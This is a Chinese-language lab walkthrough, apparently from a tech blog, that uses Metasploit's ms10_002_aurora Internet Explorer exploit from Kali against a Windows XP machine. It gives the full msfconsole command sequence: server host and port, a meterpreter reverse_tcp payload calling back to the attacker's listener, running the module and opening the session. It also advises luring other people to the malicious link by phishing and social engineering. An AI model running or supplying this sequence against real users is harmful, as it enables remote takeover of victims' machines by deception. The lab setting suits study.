kali linux

靶机:xp

二、ms10_002漏洞利用

msf5 exploit(windows/smb/ms08_067_netapi) > search ms10_002_aurora
msf5 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/browser/ms10_002_aurora 

ms10_002 IE浏览器漏洞

msf5 exploit(windows/browser/ms10_002_aurora) > show options

ms10_002 IE浏览器漏洞

 

 设置srchost(自己kali的地址,让目标主机连接)

msf5 exploit(windows/browser/ms10_002_aurora) > set srchost 192.168.244.128
srchost => 192.168.244.128
msf5 exploit(windows/browser/ms10_002_aurora) > set sevport 8080
sevport => 8080

设置meterpreter

msf5 exploit(windows/browser/ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

设置监听地址(kali主机IP)

msf5 exploit(windows/browser/ms10_002_aurora) > set lhost 192.168.244.128
lhost => 192.168.244.128
msf5 exploit(windows/browser/ms10_002_aurora) > set lport 1123
lport => 1123
msf5 exploit(windows/browser/ms10_002_aurora) > show options

ms10_002 IE浏览器漏洞

 设置target(无需设置)

ms10_002 IE浏览器漏洞

 启动

msf5 exploit(windows/browser/ms10_002_aurora) > run

如下图所示:生成连接http://192.168.244.128:8080/EMoyg47   让其他人访问(钓鱼、社工等等方式 让别人访问)

ms10_002 IE浏览器漏洞

 ms10_002 IE浏览器漏洞

 找个windows IE浏览器访问(这里xp)

ms10_002 IE浏览器漏洞

 到kali查看是否建立会话(如下图所示,成功连接会话)

ms10_002 IE浏览器漏洞

 测试,连接会话

msf5 exploit(windows/browser/ms10_002_aurora) > sessions -i 3

ms10_002 IE浏览器漏洞

 

相关文章:

  • 2021-11-18
  • 2021-09-24
  • 2021-06-27
  • 2022-02-13
  • 2021-09-04
  • 2021-12-28
  • 2021-09-27
猜你喜欢
  • 2021-03-30
  • 2021-05-07
  • 2021-12-21
  • 2021-05-10
  • 2021-08-27
  • 2021-10-09
  • 2021-11-28
相关资源
相似解决方案